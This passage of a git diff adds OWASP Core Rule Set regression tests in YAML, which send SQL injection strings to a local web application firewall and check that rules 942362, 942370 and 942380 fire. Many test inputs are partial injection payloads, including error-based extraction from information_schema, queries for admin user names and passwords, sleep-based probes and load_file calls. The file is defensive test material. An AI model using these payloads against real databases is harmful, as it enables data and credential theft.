desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "(load_file(" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-22 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 
+ uri: "/" + data: ") as ExecuteTheseSQLCommands FROM" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-23 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: ") AS schlagwoerter FROM" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-24 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "` AS `documentType` FROM" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-25 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "! 
As' from" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-26 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "; As not from" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-27 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "SELECT load_file(" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-28 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "6 As\" from" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-29 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: ") as day1 FROM" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-30 + desc: GH issue 1580 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: ", aside from" + version: HTTP/1.0 + output: + no_log_contains: id "942362" + - test_title: 942362-31 + desc: GH issue 1605 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: "a=/create" + version: HTTP/1.0 + output: + no_log_contains: id "942362" + - test_title: 942362-32 + desc: GH issue 1605 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: "a=/CREATE TABLE Persons" + version: HTTP/1.0 + output: + log_contains: id "942362" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942370.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942370.yaml new file mode 100644 index 00000000..b442913a --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942370.yaml 
@@ -0,0 +1,204 @@ +--- +meta: + author: "Christian S.J. Peron, Max Leske, Franziska Bühler" + description: | + classic SQL injection probings 2/3 + + WARNING: these tests were derived from the existing expressions and are semantically meaningless. + The tests were used to ensure that a change to the assembly file would not change the semantics. + If you know what a particular expression is supposed to catch, please revise the associated test. + enabled: true + name: 942370.yaml +tests: + - test_title: 942370-1 + desc: | + [\"'`]\s*?\*.+or\W*?[\"'`]\d + [\"'`]\s*?\*.+xor\W*?[\"'`]\d + [\"'`]\s*?\*.+div\W*?[\"'`]\d + [\"'`]\s*?\*.+like\W*?[\"'`]\d + [\"'`]\s*?\*.+between\W*?[\"'`]\d + [\"'`]\s*?\*.+and\W*?[\"'`]\d + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=' * from = 1 or '9" + version: HTTP/1.0 + output: + log_contains: id "942370" + - test_title: 942370-2 + desc: | + [\"'`]\s*?\*.+id\W*?[\"'`]\d + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=' * from = 1 id '9" + version: HTTP/1.0 + output: + log_contains: id "942370" + - test_title: 942370-3 + desc: | + [^\w\s?]+\s*?[^\w\s]+\s*?[\"'`"] + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=' = # '" + version: HTTP/1.0 + output: + log_contains: id "942370" + - test_title: 942370-4 + desc: | + [^\w\s]+\s*?[\W\d].*?# + stages: + - stage: + input: + dest_addr: 127.0.0.1 + 
headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=' ? # = #" + version: HTTP/1.0 + output: + log_contains: id "942370" + - test_title: 942370-5 + desc: | + [^\w\s]+\s*?[\W\d].*?-- + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var='? # = --" + version: HTTP/1.0 + output: + log_contains: id "942370" + - test_title: 942370-6 + desc: | + [\"'`]\s*?or\s[^\d]+[\w-]+.*?\d + [\"'`]\s*?xor\s[^\d]+[\w-]+.*?\d + [\"'`]\s*?div\s[^\d]+[\w-]+.*?\d + [\"'`]\s*?like\s[^\d]+[\w-]+.*?\d + [\"'`]\s*?between\s[^\d]+[\w-]+.*?\d + [\"'`]\s*?and\s[^\d]+[\w-]+.*?\d + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=' or homer 9" + version: HTTP/1.0 + output: + log_contains: id "942370" + - test_title: 942370-7 + desc: | + \^[\"'`] + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=^'" + version: HTTP/1.0 + output: + log_contains: id "942370" + - test_title: 942370-8 + desc: | + [\"'`].*?\*\s*?\d + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=\"` * 12344" + version: 
HTTP/1.0 + output: + log_contains: id "942370" + - test_title: 942370-9 + desc: | + [()\*<>%+-][\w-]+[^\w\s]+[\"'`][^,] + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=>foo##'." + version: HTTP/1.0 + output: + log_contains: id "942370" + - test_title: 942370-10 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: 1"and json_search (json_array(password),0b11000010110110001101100,"t_______________")# + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + version: HTTP/1.0 + output: + log_contains: id "942370" + - test_title: 942370-11 + desc: encode(lo_get(16400),'base64')::int + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: encode(lo_get(16400),'base64')::int + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + version: HTTP/1.0 + output: + log_contains: id "942370" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942380.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942380.yaml new file mode 100644 index 00000000..ab7974fb --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942380.yaml 
@@ -0,0 +1,772 @@ +--- +meta: + author: "Christoph Hansen" + description: None + enabled: true + name: 942380.yaml +tests: + - test_title: 942380-1 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "from `db_miwf`.`sys_refindex` limit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-2 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "from(select count(*),concat((select (select (select concat(0x53,0x65,0x61,0x72,0x63,0x68,0x43,0x6F,0x6C,0x6C,0x65,0x63,0x74,0x6F,0x72) from `information_schema`.tables limit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-3 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "from `information_schema`.tables limit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-4 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "ORder by" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-5 + desc: "SQL Injection Attack" + 
stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "ordeR by" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-6 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "SELECT (CASE" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-7 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=FROM+termine+GROUP+BY+tag1%26sql_delimit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-8 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "SELECT 6229 FROM(SELECT COUNT(*),CONCAT(0x717a786a71,(SELECT (CASE" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-9 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "SELECT 
CHAR(113)+CHAR(122)+CHAR(120)+CHAR(106)+CHAR(113)+(SELECT (CASE" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-10 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(120)||CHR(106)||CHR(113)||(SELECT (CASE" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-11 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "SELECT CONCAT(0x717a786a71,(SELECT (CASE" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-12 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "SELECT (CHR(113)||CHR(122)||CHR(120)||CHR(106)||CHR(113))||(SELECT (CASE" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-13 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "SELECT CHR(113)||CHR(122)||CHR(120)||CHR(106)||CHR(113)||(SELECT (CASE" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 
942380-14 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "SELECT 'qzxjq'||(SELECT (CASE" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-15 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "execute php" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-16 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user desc limit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-17 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "Execute(" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-18 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 
+ method: POST + port: 80 + uri: "/" + data: "from+information_schema.tables+where+BINARY+LEFT%28table_name%2C+1%29+%3D+%27nnn%27+LIMIT" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-19 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "from+information_schema.tables+where+table_schema%3Ddatabase%28%29+and+table_name+REGEXP+0x6d656d6265727324+limit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-20 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "fromtype%3DvBForum%3ASocialGroupMessage%26do%3Dprocess%26contenttypeid%3D5%26categoryid%5B%5D%3D-99%29+union+select+salt+from+user+where+userid%3D1+and+row%281%2C1%29%3E%28select+count%28%2A%29%2Cconcat%28+%28select+user.salt%29+%2C0x3a%2Cfloor%28rand%280%29%2A2%29%29+x+from+%28select+1+union+select+2+union+select+3%29a+group+by+x+limit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-21 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "from%2F%2A%2A%2F%28select%2F%2A%2A%2Fcount%28%2A%29%2Cconcat%28floor%28rand%280%29%2A2%29%2C0x3a%2C%28select%2F%2A%2A%2Fconcat%28user%2C0x3a%2Cpassword%29%2F%2A%2A%2Ffrom%2F%2A%2A%2Fpwn_base_admin%2F%2A%2A%2Flimit" + version: HTTP/1.0 + 
output: + log_contains: id "942380" + - test_title: 942380-22 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "HAVING+1%3D" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-23 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "execute+elysi" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-24 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%280x716a766b71%2C%28SELECT+%28ELT%283419%3D3419%2C1%29%29%29%2C0x7171717071%2CFLOOR%28RAND%280%29%2A2%29%29x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x%29a%29%26limit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-25 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%280x716a766b71%2C%28SELECT+%28ELT%289184%3D9184%2C1%29%29%29%2C0x7171717071%2CFLOOR%28RAND%280%29%2A2%29%29x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x%29a%29+AND+%27%25%27%3D%27%26limit" + 
version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-26 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "from%28select%28sleep%2820%29%29%29a%29%27%26data%5BJob%5D%5Blimit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-27 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "from%28select%28sleep%2820%29%29%29a%29%2B%27%26data%5BJob%5D%5Blimit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-28 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "from%28select%28sleep%2820%29%29%29a%29--+%26data%5BJob%5D%5Blimit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-29 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "from%28select%28sleep%2820%29%29%29a%29%26data%5BJob%5D%5Blimit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-30 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + 
headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "FROM+ack_variable+WHERE+name%3D%22cron_last%22%3B%26sql_delimit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-31 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "execute node_" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-32 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "execute scald" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-33 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "execute system" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-34 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "execute user_" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-35 + desc: 
"SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "execute views" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-36 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "execute patha" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-37 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "execute workb" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-38 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "execute panel" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-39 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=from+information_schema.tables+where+1%3D2+limit" + version: HTTP/1.0 + 
